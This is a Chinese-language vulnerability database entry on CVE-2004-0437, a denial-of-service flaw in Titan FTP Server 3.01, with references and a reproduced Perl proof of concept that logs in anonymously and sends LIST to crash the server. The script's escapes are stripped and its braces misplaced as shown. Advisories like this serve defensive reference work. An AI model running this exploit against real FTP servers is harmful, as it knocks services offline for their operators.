Titan文件传输服务器漏洞

Titan文件传输服务器漏洞

漏洞ID 1107926 漏洞类型 未知
发布时间 2004-05-04 更新时间 2004-07-07
图片[1]-Titan文件传输服务器漏洞-安全小百科CVE编号 CVE-2004-0437
图片[2]-Titan文件传输服务器漏洞-安全小百科CNNVD-ID CNNVD-200407-007
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24080
https://www.securityfocus.com/bid/83157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-007
|漏洞详情
Titan文件传输服务器3.01build163版本和可能的其他build169之前的版本存在漏洞。远程认证用户通过从系统中分离“LIST-L”命令导致服务拒绝(崩溃),该漏洞导致Titan访问无效的接口。
|漏洞EXP
source: http://www.securityfocus.com/bid/10272/info

Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.

A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.

#!/usr/bin/perl
# Test for Titan FTP server security vulnerability

use IO::Socket;

$host = "192.168.1.243";

my @combination;
$combination[0] = "LIST rn";

for (my $i = 0; $combination[$i] ; $i++)
{
 print "Combination: $1n";

 $remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2112",
     );
 unless ($remote) { die "cannot connect to ftp daemon on $host" }

 print "connectedn";
 while (<$remote>)
 {
  print $_;
  if (/220 /)
  {
   last;
  }
 }

 $remote->autoflush(1);

 my $ftp = "USER anonymousrn";

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/331 /)
  {
   last;
  }
 }

 $ftp = "PASS [email protected]";
 print $remote $ftp;
 print $ftp;
 
 while (<$remote>)
 {
  print $_;
  if (/230 /)
  {
   last;
  }
 }
 
 $ftp = $combination[$i];

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/150 /)
  {
   last;
  }
 

 close $remote;
}
|受影响的产品
South River Technologies Titan Ftp Server 3.01 Build 163
|参考资料

来源:XF
名称:titan-list-command-dos(16057)
链接:http://xforce.iss.net/xforce/xfdb/16057
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
来源:BUGTRAQ
名称:20040505TitanFTPServerAbortedLISTDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108378048513596&w;=2
来源:VULNWATCH
名称:20040505TitanFTPServerAbortedLISTDoS
链接:http://archives.neohapsis.com/archives/vulnwatch/2004-q2/0025.html

相关推荐: HP PHNE_26413 Denial Of Service Introduction Vulnerability

HP PHNE_26413 Denial Of Service Introduction Vulnerability 漏洞ID 1099759 漏洞类型 Unknown 发布时间 2003-07-28 更新时间 2003-07-28 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享